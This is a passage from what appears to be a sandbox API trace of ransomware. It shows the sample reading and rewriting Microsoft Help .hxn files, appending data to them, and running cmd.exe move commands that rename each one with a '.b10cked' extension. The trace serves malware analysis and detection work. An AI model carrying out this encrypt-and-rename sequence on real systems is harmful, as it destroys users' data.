dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSAC~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.MSACCESS.14.1033.hxn.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xcfc, dwThreadId=0xcd8)) returned 1 [0197.807] CloseHandle 
(hObject=0x1b4) returned 1 [0197.808] CloseHandle (hObject=0x120) returned 1 [0197.808] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0197.808] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0197.808] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount1=34, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount2=34) returned 2 [0197.808] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0197.808] ReleaseMutex (hMutex=0xf8) returned 1 [0197.808] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0197.808] ReleaseMutex (hMutex=0xf8) returned 1 [0197.808] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0197.808] ReleaseMutex (hMutex=0xf8) returned 1 [0197.808] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0197.808] ReleaseMutex (hMutex=0xf8) returned 1 [0197.808] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.msaccess.dev.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0197.808] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.808] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x170 [0197.808] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 
[0197.808] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=25459991789) returned 1 [0197.811] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.811] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x170 [0197.811] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.811] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.811] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x170 [0197.811] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.811] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0197.811] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x170 [0197.811] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0197.811] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.811] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x170 [0197.811] 
SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.811] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.812] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x170 [0197.812] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.812] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.812] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x170 [0197.812] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.812] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.812] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x170 [0197.812] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.812] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.812] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) 
returned 0x170 [0197.812] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.812] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.812] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x170 [0197.812] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.812] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0197.812] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x170 [0197.812] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0197.812] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0197.812] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0197.812] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x170 [0197.813] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0197.813] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: 
lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0197.813] ReadFile (in: hFile=0x120, lpBuffer=0x12ea7f8, nNumberOfBytesToRead=0xb7, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x12ea7f8*, lpNumberOfBytesRead=0x12ec08*=0xb7, lpOverlapped=0x0) returned 1 [0197.814] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0197.814] WriteFile (in: hFile=0x120, lpBuffer=0x12ea7f8*, nNumberOfBytesToWrite=0xb7, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x12ea7f8*, lpNumberOfBytesWritten=0x12ec1c*=0xb7, lpOverlapped=0x0) returned 1 [0197.814] SetFilePointer (in: hFile=0x120, lDistanceToMove=-183, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xb9 [0197.814] ReadFile (in: hFile=0x120, lpBuffer=0x12ea7f8, nNumberOfBytesToRead=0xb7, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x12ea7f8*, lpNumberOfBytesRead=0x12ec08*=0xb7, lpOverlapped=0x0) returned 1 [0197.814] SetFilePointer (in: hFile=0x120, lDistanceToMove=-183, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xb9 [0197.814] WriteFile (in: hFile=0x120, lpBuffer=0x12ea7f8*, nNumberOfBytesToWrite=0xb7, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x12ea7f8*, lpNumberOfBytesWritten=0x12ec1c*=0xb7, lpOverlapped=0x0) returned 1 [0197.818] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.MSACCESS.DEV.14.1033.hxn", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0197.818] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.MSACCESS.DEV.14.1033.hxn", cchWideChar=27, lpMultiByteStr=0x132f75c, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 
lpMultiByteStr="MS.MSACCESS.DEV.14.1033.hxn", lpUsedDefaultChar=0x0) returned 27 [0197.818] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x170 [0197.818] WriteFile (in: hFile=0x120, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0197.818] CloseHandle (hObject=0x120) returned 1 [0197.819] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSAC~2.HXN") returned 0x27 [0197.820] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\") returned 0x1b [0197.820] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSAC~2.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.MSACCESS.DEV.14.1033.hxn.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSAC~2.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.MSACCESS.DEV.14.1033.hxn.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xd1c, dwThreadId=0xd28)) returned 1 [0197.824] CloseHandle 
(hObject=0x1b4) returned 1 [0197.824] CloseHandle (hObject=0x120) returned 1 [0197.824] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0197.824] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0197.824] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount1=34, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount2=34) returned 2 [0197.825] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0197.825] ReleaseMutex (hMutex=0xf8) returned 1 [0197.825] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0197.825] ReleaseMutex (hMutex=0xf8) returned 1 [0197.825] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0197.825] ReleaseMutex (hMutex=0xf8) returned 1 [0197.825] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0197.825] ReleaseMutex (hMutex=0xf8) returned 1 [0197.825] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.MSOUC.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.msouc.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0197.826] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.826] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x146 [0197.826] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.826] 
QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=25461492885) returned 1 [0197.826] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.826] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x146 [0197.826] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.826] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.826] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x146 [0197.826] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.826] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0197.826] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x146 [0197.826] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0197.826] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.826] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x146 [0197.826] SetFilePointer 
(in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.826] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.826] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x146 [0197.826] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.826] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.827] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x146 [0197.827] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.827] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.827] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x146 [0197.827] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.827] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.827] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x146 
[0197.827] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.827] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.827] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x146 [0197.827] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.827] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0197.827] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x146 [0197.827] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0197.827] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0197.827] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0197.827] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x146 [0197.827] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0197.827] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: 
lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0197.827] ReadFile (in: hFile=0x120, lpBuffer=0x12f4da8, nNumberOfBytesToRead=0xa2, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x12f4da8*, lpNumberOfBytesRead=0x12ec08*=0xa2, lpOverlapped=0x0) returned 1 [0197.829] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0197.829] WriteFile (in: hFile=0x120, lpBuffer=0x12f4da8*, nNumberOfBytesToWrite=0xa2, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x12f4da8*, lpNumberOfBytesWritten=0x12ec1c*=0xa2, lpOverlapped=0x0) returned 1 [0197.829] SetFilePointer (in: hFile=0x120, lDistanceToMove=-162, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xa4 [0197.829] ReadFile (in: hFile=0x120, lpBuffer=0x12f4da8, nNumberOfBytesToRead=0xa2, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x12f4da8*, lpNumberOfBytesRead=0x12ec08*=0xa2, lpOverlapped=0x0) returned 1 [0197.829] SetFilePointer (in: hFile=0x120, lDistanceToMove=-162, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xa4 [0197.829] WriteFile (in: hFile=0x120, lpBuffer=0x12f4da8*, nNumberOfBytesToWrite=0xa2, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x12f4da8*, lpNumberOfBytesWritten=0x12ec1c*=0xa2, lpOverlapped=0x0) returned 1 [0197.833] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.MSOUC.14.1033.hxn", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0197.833] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.MSOUC.14.1033.hxn", cchWideChar=20, lpMultiByteStr=0x1328794, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MS.MSOUC.14.1033.hxn", 
lpUsedDefaultChar=0x0) returned 20 [0197.833] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x146 [0197.833] WriteFile (in: hFile=0x120, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0197.833] CloseHandle (hObject=0x120) returned 1 [0197.834] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSOU~1.HXN") returned 0x27 [0197.834] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\") returned 0x1b [0197.834] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSOU~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.MSOUC.14.1033.hxn.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, 